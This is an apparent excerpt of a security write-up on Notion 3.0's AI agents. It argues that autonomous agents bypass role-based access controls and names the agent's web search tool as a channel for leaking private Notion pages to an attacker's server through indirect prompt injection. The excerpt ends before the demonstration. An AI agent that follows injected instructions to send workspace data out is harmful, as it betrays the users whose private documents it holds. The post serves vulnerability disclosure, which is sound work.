AI Agents are increasingly getting integrated into SaaS platforms. Notion today announced that as part of their Notion 3.0 milestone they will be introducing AI Agents that can do everything you can in Notion—create docs, update databases, search across connected tools, and carry out multi-step workflows by planning and executing actions with MCP integrations. You can personalize or even build teams of Custom Agents that run on triggers or schedules, giving you autonomous assistants that continuously handle tasks like compiling feedback, updating trackers, and triaging requests.
The lethal trifecta problem
The "lethal trifecta," as described by Simon Willison, is the combination of LLM agents, tool access, and long-term memory that together enable powerful but easily exploitable attack vectors.
With Notion 3.0, traditional RBAC controls no longer fully apply once AI Agents can autonomously plan actions and call MCP integrated tools or inbuilt tools. An agent with broad workspace access can chain tasks across documents, databases, and external connectors in ways RBAC never anticipated. This creates a vastly expanded threat surface where sensitive data or actions can be exfiltrated or misused through multi step, automated workflows.
Exploiting the web search tool to leak contents of private Notion pages
We analyzed the set of tools under the AI agents in Notion and found the web search tool had the following name and input schema
Name: functions.search (web scope) Input: { "web": { "queries": ["
We identified this input as a significant vulnerability. Since we can construct custom queries, attackers could use this to exfiltrate data from a user's Notion instance to a malicious server on the internet.
Attack demonstration
We will show how a single well crafted indirect prompt injection attack can leak contents of a Notion page.
... continue reading